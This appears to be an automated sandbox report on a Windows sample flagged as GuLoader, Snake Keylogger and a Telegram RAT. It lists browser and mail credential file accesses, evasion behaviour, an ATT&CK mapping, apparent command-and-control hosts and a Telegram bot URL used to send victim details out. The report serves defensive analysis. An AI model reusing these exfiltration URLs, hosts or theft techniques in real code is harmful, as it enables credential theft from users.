Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595138	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Thread delayed: delay time: 594109	Jump to behavior

Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.0000000006288000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/.
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj.sn
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	API call chain: ExitProcess graph end node			graph_0-4634
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	API call chain: ExitProcess graph end node			graph_0-4630

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Process created: C:\Users\user\Desktop\pkNnK2ya0f.exe "C:\Users\user\Desktop\pkNnK2ya0f.exe"

Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Queries volume information: C:\Users\user\Desktop\pkNnK2ya0f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403373

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: pkNnK2ya0f.exe PID: 6252, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: pkNnK2ya0f.exe PID: 6252, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: pkNnK2ya0f.exe PID: 6252, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pkNnK2ya0f.exe	62%	Virustotal		Browse
pkNnK2ya0f.exe	34%	ReversingLabs	Win32.Trojan.Guloader
pkNnK2ya0f.exe	100%	Avira	HEUR/AGEN.1361137

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsm6828.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://drive.usM	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.16.142	true	false	high
drive.usercontent.google.com	172.217.18.97	true	false	high
reallyfreegeoip.org	104.21.32.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:01:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036967000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036958000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=ent2	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036926000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usM	pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/Y	pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en4	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036935000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	pkNnK2ya0f.exe	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036935000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036967000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036926000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/4	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036967000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/t2	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036958000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	pkNnK2ya0f.exe, 00000009.00000002.2340613005.0000000006288000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.office.com/lBwq	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036962000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlBwq	pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003687C000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036837000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003680C000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003687C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20a	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003680C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.32.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
172.217.18.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.217.16.142	drive.google.com	United States	15169	GOOGLEUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632194
Start date and time:	2025-03-07 20:42:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pkNnK2ya0f.exe renamed because original name is a hash value
Original Sample Name:	94e73ce7a276e8cc7b49c231a817a7f4c87e988b3ced91e56f452907e789687a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/21@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 182 Number of non-executed functions: 124
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:44:15	API Interceptor	14452x Sleep call for process: pkNnK2ya0f.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	XiJhd7Lx30.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse
	Shipment advice H-BL Draft.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse
	valorant_ESP_aimbot.exe	Get hash	malicious	Unknown	Browse
	georgefloyd.bat	Get hash	malicious	XWorm	Browse
	ZTEIhNCtP3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	uPDwUy9ewY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	OeM750ajqm.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	UFOiZapHGS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.32.1	Payment Invoice ref0306252.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	DHL AWB Receipt_pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe	Get hash	malicious	FormBook	Browse	www.kdrqcyusevx.info/k7wl/
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/scc1/five/fre.php
	Stormwater Works Drawings Spec.js	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	SFT20020117.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/7p42/
	PO from tpc Type 34.1 34,2 35 Spec.js	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/3r9x/
	PO 87877889X,pdf.Vbs.vbs	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	http://projectlombok.org	Get hash	malicious	Unknown	Browse	projectlombok.org/
132.226.247.73	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	ZTEIhNCtP3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	uPDwUy9ewY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	qUG1ZROxLJ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	HT4YGXBRtx.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	4LJHFzA8jr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	nGI2U2r41E.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	7l3CafRVv7.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	C6FGS0I3yn.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ckHregxJIq.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	XiJhd7Lx30.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	AQIu7JYa5r.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	Shipment advice H-BL Draft.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	ZTEIhNCtP3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	LE2dyDn347.exe	Get hash	malicious	GuLoader	Browse	104.21.64.1
	uPDwUy9ewY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	qUG1ZROxLJ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	OeM750ajqm.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	UFOiZapHGS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
checkip.dyndns.com	XiJhd7Lx30.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	AQIu7JYa5r.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Shipment advice H-BL Draft.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	ZTEIhNCtP3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	LE2dyDn347.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	uPDwUy9ewY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	qUG1ZROxLJ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	OeM750ajqm.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	UFOiZapHGS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
api.telegram.org	XiJhd7Lx30.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	149.154.167.220
	Shipment advice H-BL Draft.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	149.154.167.220
	valorant_ESP_aimbot.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	georgefloyd.bat	Get hash	malicious	XWorm	Browse	149.154.167.220
	ZTEIhNCtP3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	uPDwUy9ewY.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	OeM750ajqm.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	UFOiZapHGS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	XiJhd7Lx30.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	149.154.167.220
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	LtCPevm69G.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, Vidar	Browse	149.154.167.99
	Shipment advice H-BL Draft.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	149.154.167.220
	valorant_ESP_aimbot.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	georgefloyd.bat	Get hash	malicious	XWorm	Browse	149.154.167.220
	ZTEIhNCtP3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
